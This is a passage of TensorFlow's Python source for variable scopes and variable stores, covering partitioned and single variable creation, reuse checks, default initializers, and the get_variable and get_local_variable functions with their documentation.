shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: the name of the new or existing sharded variable.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
shape: shape of the new or existing sharded variable.
dtype: type of the new or existing sharded variable
(defaults to `DT_FLOAT`).
initializer: initializer for the sharded variable.
regularizer: a (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable which has well-defined semantics. Defaults
to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
when violating reuse during variable creation, or if an existing
sharded variable exists for the given name but with different sharding.
"""
if context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
initializing_from_value = initializer is not None and isinstance(
initializer, ops.Tensor)
reuse_without_partition = reuse and not partitioner
if name in self._vars:
raise ValueError(
"A partitioner was provided, but an unpartitioned version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created without partitioning?" % name)
shape = tensor_shape.as_shape(shape)
if initializing_from_value:
shape = shape.merge_with(initializer.get_shape())
if not reuse_without_partition:
if not shape.is_fully_defined():
raise ValueError("Shape of a new partitioned variable (%s) must be "
"fully defined, but instead was %s." % (name, shape))
if shape.ndims < 1:
raise ValueError("A partitioned Variable must have rank at least 1, "
"shape: %s" % shape)
partitions = partitioner(shape=shape, dtype=dtype)
if not isinstance(partitions, collections_lib.Sequence):
raise ValueError("Partitioner must return a sequence, but saw: %s"
% partitions)
if len(partitions) != shape.ndims:
raise ValueError(
"Partitioner returned a partition list that does not match the "
"Variable's rank: %s vs. %s" % (partitions, shape))
if any([p < 1 for p in partitions]):
raise ValueError(
"Partitioner returned zero partitions for some axes: %s" %
partitions)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Partitioned variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?"
% name)
existing_var = self._partitioned_vars[name]
if not shape.is_compatible_with(existing_var.get_shape()):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified shape %s "
"and found shape %s."
% (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified dtype %s "
"and found dtype %s."
% (name, dtype.name, existing_var.dtype.name))
# pylint: disable=protected-access
if (not reuse_without_partition and
existing_var._get_partitions() != partitions):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified partitions "
"%s and found partitions %s." %
(name, partitions, existing_var._get_partitions()))
# pylint: enable=protected-access
return existing_var
if reuse is True:
raise ValueError("PartitionedVariable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
slice_dim, slice_shape = _compute_slice_dim_and_shape(
shape.as_list(), partitions)
vs = []
num_slices = partitions[slice_dim]
num_slices_with_excess = shape.dims[slice_dim].value % num_slices
slice_offset = [0] * shape.ndims
if "%s/part_0" % name in self._vars:
if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but %s/part_%d was not."
% (num_slices, name, name, num_slices - 1))
if "%s/part_%d" % (name, num_slices) in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but so was the extra shard %s/part_%d."
% (num_slices, name, name, num_slices))
for i in xrange(num_slices):
var_shape = slice_shape[:]
var_offset = slice_offset[:]
partition_info = _PartitionInfo(
full_shape=shape.as_list(), var_offset=var_offset)
if i < num_slices_with_excess:
var_shape[slice_dim] += 1
slice_offset[slice_dim] += var_shape[slice_dim]
var_full_name = "%s/part_%d" % (name, i)
with ops.name_scope(var_full_name + "/PartitionedInitializer"):
# Create the tensor to initialize the variable with default value.
if initializer is None:
init, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
if initializing_from_value:
init_shape = None
else:
init_shape = var_shape
elif callable(initializer):
init = initializer
init_shape = var_shape
elif isinstance(initializer, ops.Tensor):
init = array_ops.slice(initializer, var_offset, var_shape)
# Use the dtype of the given tensor.
dtype = init.dtype.base_dtype
init_shape = None
else:
init = ops.convert_to_tensor(initializer, dtype=dtype)
init = array_ops.slice(init, var_offset, var_shape)
init_shape = None
with ops.name_scope(None):
var = self._get_single_variable(
name=var_full_name,
shape=init_shape,
dtype=dtype,
initializer=init,
partition_info=partition_info,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# pylint: disable=protected-access
var._set_save_slice_info(variables.Variable.SaveSliceInfo(
name, shape.as_list(), var_offset, var_shape))
vs.append(var)
# pylint: enable=protected-access
# pylint: disable=protected-access
partitioned_var = variables.PartitionedVariable(name=name,
shape=shape,
dtype=dtype,
variable_list=vs,
partitions=partitions)
# pylint: enable=protected-access
self._partitioned_vars[name] = partitioned_var
return partitioned_var
def _get_single_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
partition_info=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Get or create a single Variable (e.g. a shard or entire variable).
See the documentation of get_variable above (ignore partitioning components)
for details.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
initializer: see get_variable.
regularizer: see get_variable.
partition_info: _PartitionInfo object.
reuse: see get_variable.
trainable: see get_variable.
collections: see get_variable.
caching_device: see get_variable.
validate_shape: see get_variable.
use_resource: see get_variable.
constraint: see get_variable.
synchronization: see get_variable.
aggregation: see get_variable.
Returns:
A Variable. See documentation of get_variable above.
Raises:
ValueError: See documentation of get_variable above.
"""
# Set to true if initializer is a constant.
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if shape is not None and initializing_from_value:
raise ValueError("If initializer is a constant, do not specify shape.")
dtype = dtypes.as_dtype(dtype)
shape = tensor_shape.as_shape(shape)
if name in self._vars:
# Here we handle the case when returning an existing variable.
if reuse is False:
var = self._vars[name]
err_msg = ("Variable %s already exists, disallowed."
" Did you mean to set reuse=True or "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# ResourceVariables don't have an op associated with so no traceback
if isinstance(var, resource_variable_ops.ResourceVariable):
raise ValueError(err_msg)
tb = var.op.traceback[::-1]
# Throw away internal tf entries and only take a few lines.
tb = [x for x in tb if "tensorflow/python" not in x[0]][:3]
raise ValueError("%s Originally defined at:\n\n%s" % (err_msg, "".join(
traceback.format_list(tb))))
found_var = self._vars[name]
if not shape.is_compatible_with(found_var.get_shape()):
raise ValueError("Trying to share variable %s, but specified shape %s"
" and found shape %s." % (name, shape,
found_var.get_shape()))
if not dtype.is_compatible_with(found_var.dtype):
dtype_str = dtype.name
found_type_str = found_var.dtype.name
raise ValueError("Trying to share variable %s, but specified dtype %s"
" and found dtype %s." % (name, dtype_str,
found_type_str))
return found_var
# The code below handles only the case of creating a new variable.
if reuse is True:
raise ValueError("Variable %s does not exist, or was not created with "
"tf.get_variable(). Did you mean to set "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# Create the tensor to initialize the variable with default value.
if initializer is None:
initializer, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
# Enter an init scope when creating the initializer.
with ops.init_scope():
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if isinstance(initializer, type(init_ops.Initializer)):
initializer = initializer(dtype=dtype)
if shape and shape.is_fully_defined():
init_val = lambda: initializer( # pylint: disable=g-long-lambda
shape.as_list(), dtype=dtype, partition_info=partition_info)
elif not tf_inspect.getargspec(initializer).args:
init_val = initializer
else:
raise ValueError("You can only pass an initializer function that "
"expects no arguments to its callable when the "
"shape is not fully defined. The given initializer "
"function expects the following args %s" %
tf_inspect.getargspec(initializer).args)
variable_dtype = dtype.base_dtype
# Create the variable.
if use_resource is None:
# Set the default value if unspecified.
use_resource = _DEFAULT_USE_RESOURCE
v = variables.VariableV1(
initial_value=init_val,
name=name,
trainable=trainable,
collections=collections,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation)
if context.executing_eagerly() and self._store_eager_variables:
if collections:
ops.add_to_collections(collections, v)
else:
ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, v)
if trainable:
ops.add_to_collection(ops.GraphKeys.TRAINABLE_VARIABLES, v)
if not context.executing_eagerly() or self._store_eager_variables:
# In eager mode we do not want to keep default references to Variable
# objects as this will prevent their memory from being released.
self._vars[name] = v
logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
format(shape), initializer)
# Run the regularizer if requested and save the resulting loss.
if regularizer:
with ops.colocate_with(v):
with ops.name_scope(name + "/Regularizer/"):
with ops.init_scope():
loss = regularizer(v)
if loss is not None:
if context.executing_eagerly():
v_name = "v_%s" % type(v)
loss_name = "loss_%s" % type(loss)
else:
v_name = v.name
loss_name = loss.name
logging.vlog(1, "Applied regularizer to %s and added the result %s "
"to REGULARIZATION_LOSSES.", v_name, loss_name)
ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES, loss)
return v
# Initialize variable when no initializer provided
def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
"""Provide a default initializer and a corresponding value.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
Returns:
initializer and initializing_from_value. See get_variable above.
Raises:
ValueError: When giving unsupported dtype.
"""
del shape
# If dtype is DT_FLOAT, provide a uniform unit scaling initializer
if dtype.is_floating:
initializer = init_ops.glorot_uniform_initializer()
initializing_from_value = False
# If dtype is DT_INT/DT_UINT, provide a default value `zero`
# If dtype is DT_BOOL, provide a default value `FALSE`
elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool
or dtype == dtypes.string):
initializer = init_ops.zeros_initializer()
initializing_from_value = False
# NOTES:Do we need to support for handling DT_STRING and DT_COMPLEX here?
else:
raise ValueError("An initializer for variable %s of %s is required"
% (name, dtype.base_dtype))
return initializer, initializing_from_value
# To stop regularization, use this regularizer
@tf_export("no_regularizer")
def no_regularizer(_):
"""Use this function to prevent regularization of variables."""
return None
# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export(v1=["VariableScope"])
class VariableScope(object):
"""Variable scope object to carry defaults to provide to `get_variable`.
Many of the arguments we need for `get_variable` in a variable store are most
easily handled with a context. This object is used for the defaults.
Attributes:
name: name of the current scope, used as prefix in get_variable.
initializer: default initializer passed to get_variable.
regularizer: default regularizer passed to get_variable.
reuse: Boolean, None, or tf.AUTO_REUSE, setting the reuse in
get_variable. When eager execution is enabled this argument is always
forced to be False.
caching_device: string, callable, or None: the caching device passed to
get_variable.
partitioner: callable or `None`: the partitioner passed to `get_variable`.
custom_getter: default custom getter passed to get_variable.
name_scope: The name passed to `tf.name_scope`.
dtype: default type passed to get_variable (defaults to DT_FLOAT).
use_resource: if False, create a normal Variable; if True create an
experimental ResourceVariable with well-defined semantics. Defaults
to False (will later change to True). When eager execution is enabled
this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
def __init__(self,
reuse,
name="",
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
name_scope="",
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a new VariableScope with the given properties."""
self._name = name
self._initializer = initializer
self._regularizer = regularizer
self._reuse = reuse
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._name_scope = name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if context.executing_eagerly():
if self._caching_device is not None:
raise NotImplementedError("Caching devices is not yet supported "
"when eager execution is enabled.")
if self._partitioner is not None:
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
self._reuse = AUTO_REUSE
self._use_resource = True
@property
def name(self):
return self._name
@property
def original_name_scope(self):
return self._name_scope
@property
def reuse(self):
return self._reuse
@property
def initializer(self):
return self._initializer
@property
def dtype(self):
return self._dtype
@property
def use_resource(self):
return self._use_resource
@property
def regularizer(self):
return self._regularizer
@property
def caching_device(self):
return self._caching_device
@property
def partitioner(self):
return self._partitioner
@property
def custom_getter(self):
return self._custom_getter
@property
def constraint(self):
return self._constraint
def reuse_variables(self):
"""Reuse variables in this scope."""
self._reuse = True
def set_initializer(self, initializer):
"""Set initializer for this scope."""
self._initializer = initializer
def set_dtype(self, dtype):
"""Set data type for this scope."""
self._dtype = dtype
def set_use_resource(self, use_resource):
"""Sets whether to use ResourceVariables for this scope."""
if context.executing_eagerly() and not use_resource:
raise ValueError("When eager execution is enabled, "
"use_resource cannot be set to false.")
self._use_resource = use_resource
def set_regularizer(self, regularizer):
"""Set regularizer for this scope."""
self._regularizer = regularizer
def set_caching_device(self, caching_device):
"""Set caching_device for this scope."""
if context.executing_eagerly():
raise NotImplementedError("Caching devices are not yet supported "
"when eager execution is enabled.")
self._caching_device = caching_device
def set_partitioner(self, partitioner):
"""Set partitioner for this scope."""
if partitioner and context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
self._partitioner = partitioner
def set_custom_getter(self, custom_getter):
"""Set custom getter for this scope."""
self._custom_getter = custom_getter
def get_collection(self, name):
"""Get this scope's variables."""
scope = self._name + "/" if self._name else ""
return ops.get_collection(name, scope)
def trainable_variables(self):
"""Get this scope's trainable variables."""
return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def global_variables(self):
"""Get this scope's global variables."""
return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def local_variables(self):
"""Get this scope's local variables."""
return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
def get_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if context.executing_eagerly():
reuse = False
use_resource = True
else:
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
return var_store.get_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Gets an existing variable with this name or create a new one."""
if context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
if initializer is None:
initializer = self._initializer
if regularizer is None:
regularizer = self._regularizer
if constraint is None:
constraint = self._constraint
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if dtype is None:
dtype = self._dtype
if use_resource is None:
use_resource = self._use_resource
if self._custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % self._custom_getter)
if partitioner is None:
raise ValueError("No partitioner was specified")
# This allows the variable scope name to be used as the variable name if
# this function is invoked with an empty name arg, for backward
# compatibility with create_partitioned_variables().
full_name_list = []
if self.name:
full_name_list.append(self.name)
if name:
full_name_list.append(name)
full_name = "/".join(full_name_list)
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# pylint: disable=protected-access
return var_store._get_partitioned_variable(
full_name, shape=shape, dtype=dtype, initializer=initializer,
regularizer=regularizer, reuse=self.reuse, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, constraint=constraint)
# pylint: enable=protected-access
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)
class _VariableScopeStore(threading.local):
"""A thread local store for the current variable scope and scope counts."""
def __init__(self):
super(_VariableScopeStore, self).__init__()
self.current_scope = VariableScope(False)
self.variable_scopes_count = {}
def open_variable_scope(self, scope_name):
if scope_name in self.variable_scopes_count:
self.variable_scopes_count[scope_name] += 1
else:
self.variable_scopes_count[scope_name] = 1
def close_variable_subscopes(self, scope_name):
for k in list(self.variable_scopes_count.keys()):
if scope_name is None or k.startswith(scope_name + "/"):
self.variable_scopes_count[k] = 0
def variable_scope_count(self, scope_name):
return self.variable_scopes_count.get(scope_name, 0)
def get_variable_scope_store():
"""Returns the variable scope store for current thread."""
scope_store = ops.get_collection(_VARSCOPESTORE_KEY)
if not scope_store:
scope_store = _VariableScopeStore()
ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store)
else:
scope_store = scope_store[0]
return scope_store
@tf_export(v1=["get_variable_scope"])
def get_variable_scope():
"""Returns the current variable scope."""
return get_variable_scope_store().current_scope
def _get_default_variable_store():
store = ops.get_collection(_VARSTORE_KEY)
if store:
return store[0]
store = _VariableStore()
ops.add_to_collection(_VARSTORE_KEY, store)
return store
@tf_contextlib.contextmanager
def with_variable_store(store):
store_collection = ops.get_collection_ref(_VARSTORE_KEY)
old = list(store_collection)
store_collection[:] = [store]
try:
yield
finally:
store_collection[:] = old
class EagerVariableStore(object):
"""Wrapper allowing functional layers to be used with eager execution.
When eager execution is enabled Variables get deleted when they go out of
scope, and are not stored in global collections by default. A lot of code
(mostly the functional layers in tf.layers) assumes that variables are kept in
a global list.
EagerVariableStore can be used in conjunction with this code to make it
eager-friendly. For example, to create a dense layer, use:
```
container = tfe.EagerVariableStore()
for input in dataset_iterator:
with container.as_default():
x = tf.layers.dense(input, name="l1")
print(container.variables) # Should print the variables used in the layer.
```
"""
def __init__(self, store=None):
if store is not None:
if not store._store_eager_variables: # pylint: disable=protected-access
raise ValueError("Cannot construct EagerVariableStore from a "
"VariableStore object that does not hold eager "
"variables.")
self._store = store
else:
self._store = _VariableStore()
self._store._store_eager_variables = True # pylint: disable=protected-access
def as_default(self):
return with_variable_store(self._store)
def variables(self):
return sorted(self._store._vars.values(), key=lambda x: x.name) # pylint: disable=protected-access
def trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def non_trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if not x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def copy(self):
"""Copy this variable store and all of its contents.
Variables contained in this store will be copied over to the new variable
store, meaning that they can be modified without affecting the variables in
this store.
Returns:
A new EagerVariableStore instance containing copied variables.
"""
# pylint: disable=protected-access
new_store = EagerVariableStore()
for key, var in iteritems(self._store._vars):
# Strip device out of variable name.
try:
index = var.name.index(":")
except ValueError:
stripped_var_name = var.name
else:
stripped_var_name = var.name[:index]
# Create new variable with same value, name, and "trainable" flag.
new_var = resource_variable_ops.ResourceVariable(
var.read_value(),
name=stripped_var_name,
trainable=var.trainable)
new_store._store._vars[key] = new_var
return new_store
# pylint: enable=protected-access
# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export(v1=["get_variable"])
def get_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
return get_variable_scope().get_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
get_variable_or_local_docstring = ("""%s
%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
[Variable Scope How To](https://tensorflow.org/guide/variables)
for an extensive description of how reusing works. Here is a basic example:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.
Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created. Can either be
an initializer object or a Tensor. If it's a Tensor, its shape must be known
unless validate_shape is False.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
`tf.GraphKeys.REGULARIZATION_LOSSES` and can be used for regularization.
%scollections: List of graph collections keys to add the Variable to.
Defaults to `[%s]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known. For this to be used the initializer must be a Tensor and
not an initializer object.
use_resource: If False, creates a regular Variable. If true, creates an
experimental ResourceVariable instead with well-defined semantics.
Defaults to False (will later change to True). When eager execution is
enabled this argument is always forced to be True.
custom_getter: Callable that takes as a first argument the true getter, and
allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when violating reuse during variable creation, or when `initializer` dtype
and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing variable with these parameters or create a new one.",
"",
"trainable: If `True` also add the variable to the graph collection\n"
" `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ",
"GraphKeys.GLOBAL_VARIABLES")
# The argument list for get_local_variable must match arguments to get_variable.
# So, if you are updating the arguments, also update arguments to get_variable.
@tf_export(v1=["get_local_variable"])
def get_local_variable( # pylint: disable=missing-docstring
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=False, # pylint: disable=unused-argument
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
if collections:
collections += [ops.GraphKeys.LOCAL_VARIABLES]
else:
collections = [ops.GraphKeys.LOCAL_VARIABLES]
return get_variable(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=False,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation,
custom_getter=custom_getter,
constraint=constraint)
get_local_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing *local* variable or creates a new one.",
"Behavior is the same as in `get_variable`, except that variables are\n"
"added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
"`False`.\n",
"",
"GraphKeys.LOCAL_VARIABLES")
def _get_partitioned_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead which has well-defined semantics.
Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
Returns:
A tuple `(shards, partitions)` where `shards` is the list of `Variable`
shards and `partitions` is the output of the partitioner on the input
shape.
Raises:
ValueError: when creating a new variable and shape is not declared,
